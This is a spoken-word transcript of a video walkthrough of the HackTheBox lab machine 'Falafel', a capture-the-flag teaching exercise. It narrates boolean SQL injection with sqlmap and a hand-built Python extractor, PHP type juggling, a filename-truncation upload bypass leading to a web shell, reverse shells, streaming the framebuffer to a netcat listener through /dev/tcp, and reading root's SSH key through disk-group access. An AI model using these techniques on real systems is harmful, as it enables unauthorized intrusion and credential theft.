HackTheBox - Falafel

what's going on YouTube this zip set can be doing falafel from hack the box which was a really cool machine because it had its own hem system built-in meaning there are things along the way on this box that if you didn't get you'd still be able to make it to the next path but if you went too far down the rabbit hole it kind of guides you along the right way and gets you out of that rabbit hole for instance in the root of the web directory there was a foul called cyber law txt most people won't include txt in their der busting but if you did you get rewarded by it telling you hey the username you should play with is Chris and if you didn't get that hit well if you play at the log in thing you may notice that it gives you a different error message based upon if you have valid username or not so you could have just brute force that username and then once you log in as Chris it kind of tells you hey you should do some PHP type juggling would go Google that if you don't well you may just go down a rabbit hole forever with sequel injection so I really like those ideas of hints to keep you going too deep in a rabbit hole and just guide you along the path the Box should be taken in addition there weren't really any unintentional ways to solve the box he did a really good job at making a box vulnerable but not too vulnerable and that is actually really tough to do so with that being said let's jump in first let's run the nmap with the flags SC for default scripts as be a new reversion Oh a I'll put all formats but in the end map directory and call it initial then the IP address of falafel which is ten ten ten seventy three does take some time so I've already ran it looking at the results we see two ports are open ssh is listening on port 22 and apache is listening on port 80 both of these are exposing their version numbers so we could just google let's see apache two four one eight Ubuntu and get what distribution this is running by going to I think packages dot Ubuntu calm yeah so we see it is running xenial and if you looked at trusty you can see this is I think two four seven and Artful is to four to seven so we know this is probably Ubuntu xenial and doesn't really help us outside of just having that knowledge if it was a unsupported distro then that couldn't lead to things like shell shock and other things but let's just go to the falafel webpage and see what is in store for us we see an email address I tee at falafel HDB so maybe IT is a user name or maybe there's something with mail not didn't see any ports open so I doubt that clicking on login we do get a login prompt so the very first thing I'm going to try is the standard sequel injection which is single quote or one equals one so let's do admin and set that for the password and we just get wrong identification admin going trying something else let's do hips ik and put something for the password we get try again so right off the bat we have a way to enumerate user names so let us do two different things for recon you didn't have to do these to complete the box but they're there to provide hints which is my favorite thing the very first thing we're going to do is a go Buster so when do opt go Buster go Buster - H and this goes along the lines I've always have some type of recon going in the background and I'm doing two different recons because these are the first two things I normally do when coming across a site so let's do go Buster with the word list user share word list door buster directory list 2.3 medium or do the let's see extensions txt and PHP because going to the site we see it as a PHP web site we could also do things like dot swap and other things to try to find hidden files if someone was using VI in that directory but not doing that for this um let's see what else do we want to do we need to - you for specifying a URL to run it against which is ten ten ten seventy three and then we'll do - OH - write the results and we'll call this doorbuster log and let's do a vertical split and do W fuzz as well because we want to enumerate the users on this box since this little boolean thing changed so let's create a good request admin password and send this over to boot turn intercept on submit and we can see it is a post request to login dot PHP with the parameters username and password so to make this easy and want to copy something out of user share word list SEC list then we can go to user names names names dot text and this isn't on Kali by default I put it here if you just Google like github set list you can download it so when we do with this is use W funds if we do W fuzz - H and then just W fuzz we get some examples of how to use it the - C stands for - color so I'm definitely going to want to do that - Josie is payload and in this case it is doing file users text so it's going to go through all of the lines in that file then we have - - s C which is up here show responses with the specified kids so they're only showing things with 200 and then the actual URL if you do - D for post data which is what we're gonna have to do because if you looked at the request it was a post request so let's run this w fuzz - C for color - Z file names text - - will do SC as well 200 HTTP 10 10 10 73 login dot PHP and we also have to do the - D for data so put it in quotes username is equal to fuzz and whenever W fuzz sees fuzz and all caps and knows to pull it from the file then we can do and password equals please subscribe because the password doesn't matter in this case when we run it we get a bunch of responses so I'm immediately going to cancel that do W fuzz - - what - H and 7,000 let's do this quickly crap I know I want to do - H will copy this line then run this again and we can paste the line so we want to do not SC because that's always 200 - SL the length - SW the width or - Sh four characters I'm going to do I grabbed the wrong one this is show/hide is instead of s 2h so I'm going to change that - - SC to be tes H W so hide words and we're gonna specify 657 so now we have W fuzz running and it's only going to show us responses that are not 656 seven words right off the bat we got admin and we also get Chris so we have two different valid users going back to a go Buster we have interesting page robots to text and cyber law so let's check both of those out box is going a little bit slow maybe that W fuzz is slowing me down that is obnoxiously slow I'm gonna kill that because there's only two things we wanted and not sure why Callie is going soup as well there we go that's bad things up so let's try and intercept off go back to Firefox and West check robots.txt nothing there we can do cyber law text and we can see a message that says a user named Chris so that's how we could also got the Chris name if we didn't want a brute force it has informed me they could log in my account without knowing the password then take full control of the website using the image upload feature so now we know there's probably gonna be an exploit and some type of image upload and they can log-in an account without knowing the password and yeah that is about it so let's try logging in with Chris and just common passwords so let's see well again let's do like Chris password don't get anything admin password and destroying default things you could set this up to go to hydro if you just YouTube epic hydro you'll find an example of how to do that we're not gonna be doing that we're gonna play with different SQL injections so in the spirit of always running recon the background we're gonna exit w fuzz and run SQL map so let's go back to a repeater we did not record that so try to login forgot to set intercept on submit this go into Bert send this to repeater highlight copy the file and we can do login dot request what that allows to do now is just do sequel map - our login dot request we can do level 3 risk 5 + - P we want to do the usernames parameter and password parameter there was user names right username and I got these backed up risk 3 level 5 and we'll also add I think it's - - batch so it doesn't ask us any questions so let that go in the background the label it's winter now SQL map and well that goes let us try our own so if we do admin single quote let's turn this to never remember and again burp intercept off Google Maps not showing anything wrong identification admin that was weird single quote didn't change anything nope it did it was just burping intercepting so if we do admin single quote and then a comment and we still getting wrong identification so it looks like there's some type of sequel injection here so if we do admin so we'll do Union select one and then a comment we get hacking attempt detected so we can't do Union statements we could try doing like a comment here and then fuzzing it we just get try again and we could go up to a few to see if we can get Union injections working I think you could do percent 0b as well instead of these comments but that doesn't work this is am you know that so all we know is there is some type of boolean injection with this sequel and I'm gonna let sequel matte finish so you can should see without specifying the boolean thing sequel map will miss this so we'll just let this finish so sequel map finished and it found absolutely nothing so let's go back to the logic if we do admin and then the Dasha is we get the wrong identification so I'm gonna copy wrong identification whoops go back to our sequel map let's look at login dot request the username is admin so that is crucial and we're going to just do - - string and then do wrong identification and there's gonna tell burp on successful inject the page is gonna say wrong identification so now it can complete its boolean logic and determine what's good and what's bad and to speed this up I'm just gonna do DBMS my sequel because it's a my sequel database and we don't want to run checks for everything so running this and we can see it should find it relatively quickly and what this is going to do there we go it did find it so it's doing essentially usernames admin and password is like and then something so that's kind of what the query looks like and then you just filter it based upon the very first character and at the end of the video I'll probably go by and do this manually so you can see exactly what happens but for the sake of time upfront we're just going to use sequel map so sequel map found the vulnerability so we're just gonna do - - dump and it's going to retrieve everything one character at a time and see user name password role so it just dumped the table and now it is dumping the password so this for ID number one and that is the admin he is a admin role an ID number two has a different hash and he's a normal account that is Cris and it's now attempting to crack the hashes and notice it's not asking like prompting us for anything that's automatically going like do you want to do the dictionary based attack it says yes do you want to come and password suffixes it sort of defaults oh no that's because I did the batch option so let this go a little bit quicker and the batch just means always choose what is default should come back with the result anytime now there we go we got cracked password juggling for Chris so let's try logging in while it keeps trying to crack roots password so if you do Chris well again with juggling login successful and we are going to a new page that just says Chris juggle abide a hacker by night and there's a lot of references to jungling so this is PHP type juggling so the very first thing I did when I saw this was I went to repeater and tried like making username a array and then we go down and we just get invalid username password so I ditch that and then went back to the hash for admin and notice it was 0e and when PHP sees 0 e it converts that into a number because it thinks 0 exponent so that 0 e whatever is being treated as 0 to the whatever power which is always going to equal 0 so as long as we can find a collision that begins with 0 E it's going to work and that works only if the PHP code is like num is double equal to 0 e whatever PHP has a triple equals that makes it so you can't do type jungling so if it's triple equals to this it's not going to treat that right side or left side as a integer number n treated as a string so let's just Google for like PHP zero e hash collision because we're just looking for any md5 hash that begins with zero e go to this hacker news thing and once this loads we'll see if this has a page there we go so we got echo - n - 4 0 so let's go to this logout login with admin with that hash or that password we get login successful and we go to a page and just to verify that is because the juggling we're gonna do a different one will do this bottom one we can do admin and then paste this and we get login successful and you may have done this without doing the type confusion because once a box is live for so long people gonna post stuff about it online if you just googled the hash you would have got the password is king of falafel so that is what people are doing the hash collision against King a falafel was I think the actual intended password for that user maybe just a huge crack got that one so wheel lead once logging in we go to this upload via URL page so it's telling us hey specify the URL of an image to upload so my very first thing to do is setup netcat there's no longer SQL map we'll just say bash and do listen on port 80 go to this page and make it connect back to us and my IP is 10 10 14 30 and clicking upload maybe I'm not 14 30 no bad extension we need a image file so we do HTTP 10 10 14 30 slash tip set gif going back to a terminal we see W get 17.1 so when I see this I do search poit W get and there's gonna be a little bit spoiled this actually won't work I'm not sure why that W good version should be vulnerable I'm guessing the distro had patched it and didn't update something like the version information because this certainly should have worked so if we look at this exploit let's just make the directory W get I guess and then search boy - m2 mirror this and copy that text this is very much like I forget what box it is there was a box what W gate was used as a prayer vest if you just YouTube for if ii w get you'll probably find it let's see so what happens is w get followers redirects so if you do it w get against a page it redirects you to something else w get will follow that and download that content there was a bug where if it redirected you to an ftp page it could actually serve you a different file name so what we're trying to do is trick this into having a URL that ends in dot gif and download a actual dot PHP file so this proof of concept actually led to code execution because they were writing it into the root directory if we go back here we can see we have two view source go to the bottom we can see just before it it's changing the directories then doing a double you get so it may not work that way and then i had also not to go through a hundred different tangents but I also tried things like - Oh HTTP 1010 1430 upload dot eps a gif and that - oh is output file so we'll do if site dot PHP and it requires it to be a URL and it also requires them on the server side so I don't think it's vulnerable that way a proof-of-concept exploit see that is just creating the initial file to download and here we go we want to start copying this I want to scroll down that's odd copy select I guess it won't go down it when I'm in VI so let's just cut that then go up to where we were see to the Python code select copy it down it's the very end hit enter and we can do exploit PI set paste paste it in and we just edit this a little bit to work because it's trying to create aw get RC file so let's do right here on this do get and it's redirecting to anonymous dot W get RC we don't want that we want to download the file EPS a PHP redirect to the new location that should be fine the post request we're not actually doing anything this is for when it actually tries to get the code execution HTP listen port or IP let's change this to 1010 1430 this to 1010 1430 root drawn and we need FTP so let's just graph that thing for I think it's PI FTP for a quick FTP server and we'll have to create the file EPS AK PHP and I'll just echo we subscribe and I'm doing echo first because if PHP Safe Mode or something is on I'm just doing a super simple PHP thing to tell if it works before I jump to the unsafe functions like code execution so start the FTP server then we want to start the WebEx boy we have to go into the W get directory start that if we wanted to we could test it out if we do W get localhost a SD we get connection failed because I don't know W get 10 10 14 30 maybe I don't have localhost of my Etsy host file again there we go and we can see the request redirected us to FTP to download a PHP logged in down the file but still saved it as a SD because my W get version is patched if we had done I think it's trust server name is that a there we go that is the augment if you wanted to still trust whatever the server gives you and it now save zipsak dot PHP but let's remove those and then run it against the actual box and see what happens we can just upload this again we see it served the file and FTP attempt it a host it so going to this output go to the bottom we can see it retrieved if set dot PHP but still saved it as if SEC dot gif and if we go to uploads whatever let's see what we see if we get to that file so nothing too interesting there and we can't get to uploads either so at this point you should go back and poke around at other things if you click on the profiles for admin you would have seen a hint that says know your limits so that is hinting at W get has a maximum character length so what I did was googled max character length Linux I forgot file name but we get Linux has a maximum file length of 255 characters so what I did let's kill this W get stuff was do a pattern create for 255 characters so I'm going to locate pattern create and just paste this - length 255 I think was the max characters so what it said yep 255 so copy this will make a new directory called dub-dub-dub says we're no longer doing that w get exploit and then touch that VI edit tip SEC was here and then Python simple HTTP server 80 actually we need to do dot gif it has to be ending in an image so will 1 2 3 4 gif crap need to phonemes there we go so now we have this long file that ends in gif do this and I suppose if we wanted to we could even if we do a file against that it thinks it's a ski so if we add the magic bite for a gif what's that working VI huh tab autocompletes not working on that file that is bizarre but add gif 8 that is the magic bytes works with file maybe you can't VII dot gif and that's why it's not now file thinks it's a gift so if there was that type of check in this application we would bypass it and we start the web server go back to falafel upload paste that and put the URL as 10 10 14 30 upload we see it downloaded the file and if we look at the results we see the name is too long 255 characters total trying to shorten so new name let's see what this is this is a new name notice it got rid of that dot gif and we can do echo dash n to make sure it occurs without the line break because that gives us an extra character then WC - C - count the characters we see 236 so everything after 236 characters just got cut off so what we can do is take this or we can just do a Python - C print a times 232 because we want to include an extension which will be dot PHP copy this and then VI that dot PHP dot gif and then do a shell so cat shell PHP or do CMD dot PHP copy paste save did all rights on em simple HTTP server so what's happening here is all this up to here is 236 characters and that is the maximum length W gets going to take and it's going to cut off everything after that which is the dot gif and the application when it sees that string is gonna see it ends in dot gif and pass the check so let's test this out if we go back we can put two euros HTTP 1010 1430 slash that long foul name upload it control you so we can see the source and we can see saving to let's see what the new file name is all A's dot PHP so if we go into upload slash this directory let's get rid of oh we can leave view source it's fine go into that directory and then paste the file name of all A's dot PHP we get the file it does exist and we can do a command like Oh am i live do tip equals Who am I and we get dub-dub-dub data so there we go we got the code execution so now let's send this over into burp so we can easily manipulate what commands we send so turn it intercept on refresh the page send to repeater and then let's convert this into a post request because post requests have less Bureau rel filtering things you have to worry about so let's change request method and go to reverse no cheatsheet to find a she'll before you do that turn aricept off fantastic e reverse shell cheat sheet and try this very first one first doing repeater I think I just paste it twice there we go 1010 1430 we do it on port 9000 and CoV NP 9,000 to listen click go George it ok we didn't get anything let's do URL encoding with control you go immediately get something back nothing there so let's move down the list and try a different reverse shell normally when that fails I try netcat and before we do that we can just do which and see it does exist so paste this in 10 10 14 39,000 control you to encode it click go nothing immediately back because if we look we have a shell if we do hostname we have falafel so let's do Python C and port PT y PT y dot spawn then bash pythons not found so Python 3 dash C and copy and paste there we go and then let's make it so we have tab autocomplete by backgrounding with ctrl z st 2y raw - echo FG there we go and if we do clear anything it doesn't work because the term environment is not set so we'll do export is equal to we'll say screen and now we can clean up the screen a bit the first thing I want to do is run Linux primp chacker so let's copy that so CP op Winx o'doole any numbness H just because it doesn't have Python 2 and the copy of Linux prim prim checker I have is Python 2 not Python 3 and airs out so doing with Lynn enum and then we can host that and then we can just curl 10 10 14 30 / when SH type it over to bash there we go and while that runs let us grab Linux protector or not let Bart Linux exploit suggester that's what I wanted to say and I normally grab a new copy every time I do it because well updates happen frequently to these types of scripts so Linux exploits a gesture so I never want to use what's on my hard drive just in case an update came and was Linux exploit suggestion - I haven't seen that one before what are you let us see real quick I bet this is Python Perl and get away I don't feel like dealing with parole so very first thing I always do is click on the forks and see if there's any more up-to-date ones and it looks like there is there is this see Morris who has been committing quite a bit and this guy has a more recent commit but it don't impress me much because well I like saying commitment and see Morris definitely has more updates so we'll do this because it looks like he's adding things as he goes so we switched to his repo click back here and now we can just do a git clone and let's see we CD in here I hope you can just run this bash script and don't need everything file s what is that unless is other stuff let's just copy this and hope for the best looks like this guy made it a little more complicated so that skin is complete we can do the same thing with Linux exploit so gesture dot Sh forgot the pipe it to bash and while that runs let's go to the very top and look through or Lin enum Sh so these are two different privileged shekel ones we see it is running Ubuntu zaniel we had known that already users we have yossi is logged in and he's logged into a physical terminal tty 1 we can see mooch Moshe I don't know what that is is logged into the sudo terminal but someone's logged in physically to this box users on this box sample entries permissions home directory contents HTML has one because if dub-dub-dub data I think root is allowed to log into this box bailable shells not interesting nothing too interesting in crontab looking at it's not really talking to anything we can see tcp and my sequel as listening ports look at su ID files it looks like nothing is out of the ordinary only root can read the password file cell we're not coming up with a whole lot of things here and that is the contents of exploit suggester so they're due linux exploit so let's see it is telling us that it is vulnerable to this cv looks like it's saying a lot of CVS it's vulnerable to so maybe we needed to copy all the scripts but this 2018 CV is interesting since I think this box was released in 2017 we do au name - r or do you name - a and pull up this kernels build copy paste this in paste that in copied freaking HTTP C do that with Ubuntu links image this is probably it when was this release does this have a release date it doesn't but if you got a release date and you saw it was before this then you can assume it is vulnerable to the CVE so let's just copy this and add it to notes so we'll come back to that again at the end of the video because that isn't the intended way to privacy the intended way is we got to find a way on to a different user so we are dub-dub-dub data we do ID that shows us that so whenever you get a web application the first thing I generally do is go and look at the sequel password so I'm going to guess the sequel password maybe in connection dot PHP and we see it's logging in to the sequel server 3306 as Maj with the password falafel is really tasty so we could just su most - and do that and login that way but since we're not on a real terminal I'm just gonna try to SSH straight as him so motion at 10 10 10 73 set the password there we go so we can get out of this web shell it doesn't look like it wants to exit so we'll just ignore that we can kill that pain and not close it cleanly and now we could get that user dot text file so if we do WCC user dot txt we can see it is 33 characters because I there's a line break in there which makes it that extra character I'm gonna type bash so now I have that tab auto-completion it is really annoying not having that and we could run win prim checker again I'm gonna run just ID and looking at it we have a weird group or a part of video and I see that's weird because normally don't see that and it does signify that you can read the monitor output and we saw that the yossi user was logged in physically to the box with the TT why so generally won't happen in hack the box machines because well it's physical you'd have to pull up the KVM so it looks like there's some type of auto wall again or that users doing something physically on the box so let's dump his monitor it's actually a device and /dev I think it's FB I figured what FB stands for but there we go so if we open a new window we can do NC l v NP we'll listen on port 9000 again and say this is gonna be FB draw and then we can cat dev FB and pipe it to dev TCP 1010 1430 and then the port 9000 so we're sending the contents of dev FB 0 to a net cat session and there are netcat sessions going to direct it to a file and save it so there we go it saved that file if we do file on FB draw we can see it's a target image data so let us try to open this with and there's probably other applications to open it with I'm just using what I know and we can do documents h-2b boxes falafel and it's not here we have to select the file type and say it is a raw image data and instead of all images change to all and do FBR ah when we open this we get a bunch of garbage and we can try changing it to all different sorts of things it doesn't work and that is because it's doesn't have the resolution correct so on this we have to cat the sis class I don't know what it is here so let's do CD / sis find dot and grep for fb0 is it's this class graphics let's see devices could be devices name power dev pan mode yeah I think it's in devices so CD devices PCI 0 Z 0 let's just copy this I'm sure it's symlink somewhere maybe it's in symlink 2 graphics maybe that's why it shows that this class graphics CD yeah it's linked here so quicker way to type it you could have just copied and pasted that long string or done this thank you for can verify that by LS - la I won't worry about it yeah we can see the sim link here that it is going to that so we go to FB 0 and list the different things let's see we got bits per pixel let's see what that is that is set to 32 we got mood what is mood blank virtual size we can see 1 1 76 by 8 8 5 these this is the actual resolution so if we go back to that we can say 1 1 7 6 and we want 8 8 5 and this also if we do 32 does anything happen not really let's just do one and open we can see the actual contents of the monitor and he's trying to set the password to maj please stop hacking me exclamation point and user doesn't exist and then he changed the password so we can assume that you sees password is that moosh please stop hacking me so let's su you see moosh please stop hacking me exclamation point and we can log-in so I'm going to close this out because I like everything to be clean and we're going to open up a new thing so this will be moosh and open a new ssh as you see at 10:10 1073 put the password ok LS - la there's a bash history so let's check that out oh it's zero bytes no point in checking it out is it that so it's now actually him so let's see what can we do here we do ID we can look at what is different here and we see that this user is a member of the disk group and the disk group actually owns the hard drive so you could strings dev sta-1 grep route text and it would eventually find it maybe it's SD a5 it's one of these disks there we go it's finding some stuff but that could take a while so there's also a program called F s debug I think what is it locate - debug that's not what I wanted shoot what is it debug FS there we go there we can do dev SDA one we do LS in here we can see different directories so we do cue to exit that we can go into route do LS and we can see route text we also see dot SSH so I'm going to go into SSH and then do another LS and see that there is a authorized key file and ID underscore RSA so I'm going to grab that and we're going to cat ID RSA grab this file name this guy Josi and then a new one and create root key paste the IDRs a file sage mod that to 600 and then we can SSH - I root key root at ten ten ten seventy three and we are now root on falafel if we do WCC on root dot txt we see it is 33 characters and of course one of those the line breaks of that is the md5 hash so that is the way to do this box if you wanted to you go all the way back and let's get the shell one point nine thousand again and let's do the colonel exploit so Python em simple HTP server 80 we already have that nclb MP 9000 go to bash me play this got the shell Python 3 let's get a proper PT y ok so let's go to let's do town and let us download a do that actual exploit so we do cat notes we see CVE 2018 1 0 0 1 so it's search boy can we look for that we sure can't so let's Google that POC and we get 1 here so let's go to the top result first and try this out rational love good or raw we could clone it or just copy and paste be rational love dot see set paste paste it in go to the top and let's see if there's any compiled instructions doesn't look like it just - OH - say an output name so let's try this we can just do GCC - OH rational love and then specify the file did not find it I think have to be in dub dub dub is that why I put it it's not why I put it oh I didn't do it since I pasted it crap let's go back here copy everything that's why it asked me to save I thought I had just downloaded it it's not it paste right into set paste there we go geez see - OH rational love rationale of dot C looks like it compiled just fine so let's move that into dub-dub-dub and then we can go to a shell : - L rational love 1010 1430 rational love LS looks like a copy chmod plus x and then execute it and is attempting to gain root C if it does escalation failed see if we can do something to make this work maybe what needs that PID flag so let's see what it was talking about with PID may also try the PID for EM if you want to test the program on an existing namespace or CH rooted mounts not sure exactly how to find the namespace or whatever mount the SEF drap root I shouldn't see a true yes yeah grep CA true is that running anywhere no let me do a rational love PID six seven eight nine I guess I'll be let's not do that one let's do six eight two five six seven eight seven see if that works nope just try this again see it wants us to be this to have one I guess once this vanishes should have been vulnerable let's cap this that is set to one let us look back at this exploit don't need that that let's see one two is any ill 1604 three cat Etsy LSB release 1604 three Lib C version two to three zero Ubuntu 904 I want that Ubuntu ten is throwing it off maybe we don't have the correct offset let's see I have no idea what it's doing Linux Mint has one less a let's see and Debian stretch yeah I actually have no idea how this exploit is working but certainly is not working for us so let us try a guess doing it with Metasploit maybe Metasploit has a better offset for us so let us anybody just MSF console actually let's start Postgres service PostgreSQL start well that works whoops keeps pointing the wrong way see ya MSF console and we can do MSL venom grab for Linux and we want to do - - list one of these we'll finish first and we'll begin setting up the handler okay use exploit multi hammer set L host - ton zero set L port - lets do ninety ten search there we go let's see we want Linux probably x64 if we have it there we go x64 meterpreter let's do this one MSF of atom - P hello host equals ten ten fourteen thirty four equals ninety ten - F elf - OH call this which output I guess payload sequel to their head search whoops set show options verify it's all there looks good start the handler base64 and code this to quickly send it v well just to Matt paste base64 - d-mat chmod plus X and now we got a meterpreter session I should have made sure we had the payload for this first let's do search rational love rational I do not have rational level my Metasploit that is awesome national love Metasploit because way there was a module for this rapid7 source-code G Lib C real path probe ask that's why one search G Lib C real do not have that wonder how old my Metasploit is okay yep certainly do not have that see that's good hop we will just redownload Metasploit thought i didn't update on my cali more recently then oh three days ago get clone one can hope that it's just not in the dist half depository yet so once this get finishes hopefully we can just MSF console within this I don't we don't run this off of get so we'll find out okay we have downloaded it so let's go into it we can find dot let's grab for G Lib C real okay we definitely have it he's cute MSF console bundle install let's update everything hopefully this doesn't screw over my whole Cali never know it probably just killed my existing mat Metasploit well this is awkward the gem bundle install failed can we do it myself console and hope for the best if not I guess we'll blindly run this next command nope gem install fales can I go back and still run I myself console yep looks like we still do Metasploit so let's see let's locate where MSF console is probably in user bin unfortunately okay where does Kali install Metasploit locate Metasploit let's see we'll do locate exploits windows use a share let's grab - B exploit DB because that's all search poit stuff so we can find a copy out of user share Metasploit framework and will delete modules plugins and scripts and hope for the best scripts I think those are the order data as well and then we will copy out of opt Metasploit and you should probably never do this no idea what's going to happen so we'll copy modules copy plugins copy scripts and we'll copy data MSF console and oh man we got a lot of errors for I guess OS X stuff I guess it's only OS X so it doesn't bother us hopefully so exploit multi handler el host hell port payload exploit we're on meterpreter and search gee Lib see real cash hasn't been built yet I guess that's a good sign it is searching for that module and we now have the module so let us use this and I guess hope for the best so options set do we have compiled I guess we can just leave everything to default first set session to one run and let's see what happens exploit failed failed to validate session so options session is 1 sessions is 2 I wonder why that's that Ron God darn it we have to set L host Don zero do it twice for good measure and we started the Hamlet writing the exploit and launching it and it doesn't look like it worked I'm assuming we would have got a callback like near immediately exploit completed with no session created is there anything in Advanced Options doesn't look like it so I just screwed up my Metasploit for almost no reason at all since this did not work what if I set compiled a false if it pre compiles it cuz I don't think this box had GG gdb right yeah to a GCC it's that compile false run anything different gonna happen nope so I'm not exactly sure why this box isn't vulnerable I'm guessing it some weird offset thing maybe I'll come back to it if I find out before I release his video but we're going to ignore all of that I guess sorry I guess exploits don't always work and as I say in almost every video I should do more time prepping to make sure all this stuff works before I start playing around but yeah oh well let's just create a new window and start with the Python stuff so make the directory Python and we're going to go back to the SQL injection and do this manually okay so let's do this the first thing we have to do is actually reinvestigate this SQL injection so we can understand it so I'm going to go to the login tab my repeater and we're going to do the SQL injection if you remember we did admin we can see this size is seven thousand three hundred and ninety three bytes and that just says wrong identification admin and if we put something else like my name hip sack we're gonna see seven thousand three hundred seventy six bytes and that says try again so whenever we see 93 here we know the query was a success I just don't feel like scrolling all the way down every single time so go back to admin ninety seven thousand three ninety three so that's good then when I add a single quote and we get seven thousand three hundred seventy-six because we don't have a comment the SQL and query failed it was like select star from users where username equals admin and password equals I have admin here as well so these are probably in single quotes and what we did was we injected an admin and added a single quote which quaid creates a unequal number of quotes so when we add the comment and he raises all of this and that becomes a valid sequel query so we're going to do exactly that and we can see it's back to seven thousand three hundred ninety three bytes so now we have to do and password is like and if we did star like we did earlier it's an error message three hundred and seventy-six because star is not the wild character in SQL percent is ninety three so we'll get there and if we did zero because we know the admin begins with zero we still get 93 now the next character is e if we didn't put E and put a we get the error message seven thousand three hundred and seventy six bytes if we do e we get seven thousand three hundred ninety three so we can also do a substring command so a sub STR and that's going to pull a character by character out of password so substring password we want to pull the very first character and then the next thing is how many characters so if we did one here we're only going to pull the very first character and we can change that like to be an equal so the very first character a password and only grab the first that's what that second one means and we get seven thousand three hundred ninety three if we change it to be the second character and only grab one character it's going to fail 376 if this o was an e it's going to pass so that is the logic behind this SQL injection so let's go over to a Python script and create SQL and Jack by and the first thing we're going to do is input the request module this allows us to easily create a Python request and we're going to do cares is equal to we can just do 0 1 2 3 4 5 6 7 8 9 then ABCDEF there's the valid ones in a md5sum it's just tax characters and if we do foresee and it cares and print C we do Python 3 SQL inject we're looping through every character we also want to do a function or do def get SQL I for index C for the character and we're going to return admin then single quote and substring password % s this can be the very first variable and that's going to be the index one because we only want to get one character equals percent s and then a comment and then we do a percent I comma C and that means the eye is going to go into the very first percent s right here and the C is gonna go into the second percent s right there so we can do now for C n cares let's do print get SQL we'll just get the first character every time and C and we have to close out that print Python 3 and we can see the SQL injection trying every single character so now we have to create the actual request so we're going to do for I in range 0 32 and if we print I here I've got Python 3 we go 0 to 32 we actually don't want that we want one because the very first character is going to be one so from this now we can do a four-seat and cares so what this going to do is loop over every character in the password then loop over every character in a list and I'm using tabs oh well spaces sure you use but yeah tabs are work injection is equal to get SQL I see so this is going to just create a variable so it's easier to read and that's going to create this as a string then we can do payload is equal to and we have to create this as a dictionary I think that's correct to them because that's just what a request module wants for a post request so the username parameter is going to be equal to injection and then the password parameter can be equal to anything will do please subscribe to keep it like well we always do and I'm gonna keep using the same quotes I don't know why I change them there okay then we can do our for the request module equals request post HTTP 10 10 10 73 falafels IP address login dot PHP and then data to make this a post request is equal to payload okay then we can do if wrong identification in our dot text print the character and we'll just do that for now so we can see exactly what it looks like and make sure it works a request has no attribute posts its post there we go 0e 4 so that's working it's printing one at a time and this is why I like Python 3 because when you just do and is equal to that which is nothing and then flush is equal to true so now when we run this it just puts it all on one line and they can go and optimize this a little bit and break after the very first match because this is looping all the characters and once it hits a successful character it's going to continue to loop bring this break here is going to make it exit the first loop and then just go to the next character and then after this we can print a break line and let's go oh that did not work C comma and that should have worked let's see it's probably got some type of line break by default when it does elute this way so we're just going to make this a list by default no comma here okay let's see if this works finding it like this I could have swore you did I'm actually not exactly sure what's going on this is a little weird negative one does that chop off last nope is it like ends with let's see Python three don't print newline I don't print without new line or space I wonder if my this print oh this prints in the wrong spot I'm an idiot here we go 0e 4 you can see us going a little bit faster with that break and that gets the administrators hash we can copy this and just do echo - n paste this WCC 31 so we have to create this loop to be 33 and now we'll get that last character to make it 32 characters which is an md5 hash so this is how the SQL injection is working and if you wanted to I'm not gonna actually code this but I'll show you a small trick to make this a little bit faster and it's up to you if you want to do the coding we could also see the easiest way to explain this we'll just do it so if we do would to convert this into an ordinal number and the very first one let's see is going to be 1 which is 0 this isn't going to work 7300 76 because free man ASCII table man ASCII we can pull up an ASCII table and if we go down to 0 the ordinal numbers I believe our decimal and go all the way down to 0 we can see that should be 48 so if we equals 48 here we get 7200 93 which is the correct thing so if you want to speed this up you could say ok well if this number is where is the last number greater than 58 so if we do greater than 58 we know it's going to be a character and if it's less than 58 we know it's going to be a number and then we don't have to loop over the characters because we know we just eliminated nine things at once essentially so we put that here if it's less than we start the loop here if it's more we start to loop here and you can also go even further and then say if it's less than whatever ORD for is go back more than go forward and do those less than or greater than to take out a bunch of characters at once and that will speed this up greatly so instead of making like 15 requests you make two requests to find it or something like that and I think that's gonna sum up the video so yeah hope you guys enjoyed this take care and I'll see you next week